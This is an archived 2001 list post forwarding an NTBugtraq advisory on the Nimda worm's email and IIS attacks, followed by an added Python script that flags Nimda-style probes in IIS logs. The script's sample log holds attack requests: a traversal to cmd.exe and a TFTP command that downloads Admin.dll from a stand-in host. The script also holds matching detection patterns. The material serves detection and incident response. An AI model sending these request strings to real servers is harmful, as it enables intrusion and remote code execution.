The text of the new worm thingy info...

At 11:30 AM 9/18/2001 -0400, you wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>There have been numerous reports of IIS attacks being generated by
>machines over a broad range of IP addresses. These "infected"
>machines are using a wide variety of attacks which attempt to exploit
>already known and patched vulnerabilities against IIS.
>
>It appears that the attacks can come both from email and from the
>network.
>
>A new worm, being called w32.nimda.amm, is being sent around. The
>attachment is called README.EXE and comes as a MIME-type of
>"audio/x-wav" together with some html parts. There appears to be no
>text in this message when it is displayed by Outlook when in
>Auto-Preview mode (always a good indication there's something not
>quite right with an email.)
>
>The network attacks against IIS boxes are a wide variety of attacks.
>Amongst them appear to be several attacks that assume the machine is
>compromised by Code Red II (looking for ROOT.EXE in the /scripts and
>/msadc directory, as well as an attempt to use the /c and /d virtual
>roots to get to CMD.EXE). Further, it attempts to exploit numerous
>other known IIS vulnerabilities.
>
>One thing to note is the attempt to execute TFTP.EXE to download a
>file called ADMIN.DLL from (presumably) some previously compromised
>box.
>
>Anyone who discovers a compromised machine (a machine with ADMIN.DLL
>in the /scripts directory), please forward me a copy of that .dll
>ASAP.
>
>Also, look for TFTP traffic (UDP 69). As a safeguard, consider doing
>the following:
>
>edit %systemroot%/system32/drivers/etc/services.
>
>change the line:
>
>tftp 69/udp
>
>to:
>
>tftp 0/udp
>
>thereby disabling the TFTP client. W2K has TFTP.EXE protected by
>Windows File Protection so it can't be removed.
>
>More information as it arises.
>
>Cheers,
>Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
>
>-----BEGIN PGP SIGNATURE-----
>Version: PGP Personal Privacy 6.5.2
>
>iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMMDUChVqn6yReQXqEH
>Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJUupDHB1Yy1DY/po6
>iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQjamKI2eqd4TdE0yfIO
>hSW7yN2lhJc=
>=YAwc
>-----END PGP SIGNATURE-----

Archives: http://www.mail-archive.com/cf-community@houseoffusion.com/
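As an added example (not part of the NTBugtraq message or of the list post above), the script below scans IIS W3C extended-format log lines for the request patterns the advisory describes: ROOT.EXE under /scripts or /msadc (the Code Red II backdoor), CMD.EXE reached through the /c and /d virtual roots, and a TFTP fetch of ADMIN.DLL. The sample log is constructed, and the regexes are this example's own assumptions about how those probes show up in a request line; the advisory itself gives only the indicators, not literal URLs.

```python
"""Flag Nimda-style IIS probes in a W3C extended log (added example, not from the advisory)."""
import re
from urllib.parse import unquote

# Constructed sample IIS 5.0 W3C extended log (not a real capture). The first five
# requests mirror the indicators in the advisory; the last two are benign.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-09-18 15:30:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 15:30:01 192.0.2.10 GET /scripts/root.exe /c+dir 404
2001-09-18 15:30:01 192.0.2.10 GET /MSADC/root.exe /c+dir 404
2001-09-18 15:30:02 192.0.2.10 GET /c/winnt/system32/cmd.exe /c+dir 200
2001-09-18 15:30:02 192.0.2.10 GET /d/winnt/system32/cmd.exe /c+dir 404
2001-09-18 15:30:03 192.0.2.10 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20192.0.2.10%20GET%20Admin.dll 200
2001-09-18 15:30:04 198.51.100.7 GET /index.htm - 200
2001-09-18 15:30:05 198.51.100.7 GET /images/logo.gif - 200
"""

# Ordered most-specific first. Each pattern is this example's assumption of how the
# advisory's indicator appears in the URL-decoded "stem?query" string (case-insensitive).
INDICATORS = [
    ("tftp_admin_dll",    re.compile(r"tftp.*admin\.dll", re.I)),       # TFTP.EXE pulling ADMIN.DLL
    ("codered2_backdoor", re.compile(r"/(scripts|msadc)/root\.exe", re.I)),  # ROOT.EXE left by Code Red II
    ("virtual_root_cmd",  re.compile(r"^/[cd]/.*cmd\.exe", re.I)),      # CMD.EXE via the /c or /d roots
    ("cmd_exe_other",     re.compile(r"cmd\.exe", re.I)),               # CMD.EXE by any other known IIS path
]


def parse_w3c(text):
    """Yield one dict per request line, keyed by the column names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("request line seen before a #Fields directive")
        parts = line.split()
        if len(parts) != len(fields):
            continue  # truncated or malformed line: skip rather than mis-assign columns
        yield dict(zip(fields, parts))


def classify(rec):
    """Return the first matching indicator name for one parsed record, or None."""
    query = "" if rec["cs-uri-query"] == "-" else "?" + rec["cs-uri-query"]
    target = unquote(rec["cs-uri-stem"] + query)  # decode %5c, %20 etc. before matching
    for name, pattern in INDICATORS:
        if pattern.search(target):
            return name
    return None


def scan(text):
    """Return hits as (c-ip, indicator, sc-status, decoded uri-stem) tuples, in log order."""
    hits = []
    for rec in parse_w3c(text):
        name = classify(rec)
        if name:
            hits.append((rec["c-ip"], name, int(rec["sc-status"]), unquote(rec["cs-uri-stem"])))
    return hits


def summarize(hits):
    """Per probing IP: the set of indicators seen and whether this server ever answered 200."""
    summary = {}
    for ip, name, status, _ in hits:
        entry = summary.setdefault(ip, {"indicators": set(), "succeeded": False})
        entry["indicators"].add(name)
        if status == 200:  # a 200 on these requests means the command ran on this server
            entry["succeeded"] = True
    return summary


if __name__ == "__main__":
    for ip, entry in summarize(scan(SAMPLE_LOG)).items():
        verdict = ("this server answered 200: check /scripts for ADMIN.DLL"
                   if entry["succeeded"] else "probed only")
        print(ip, sorted(entry["indicators"]), verdict)
```

The status code matters as much as the path: a 404 on /scripts/root.exe means the Code Red II backdoor was not there, whereas a 200 on any of these requests means IIS actually ran the command, so the server whose log this is (not the probing c-ip) is the one to inspect for ADMIN.DLL in /scripts, as the advisory asks.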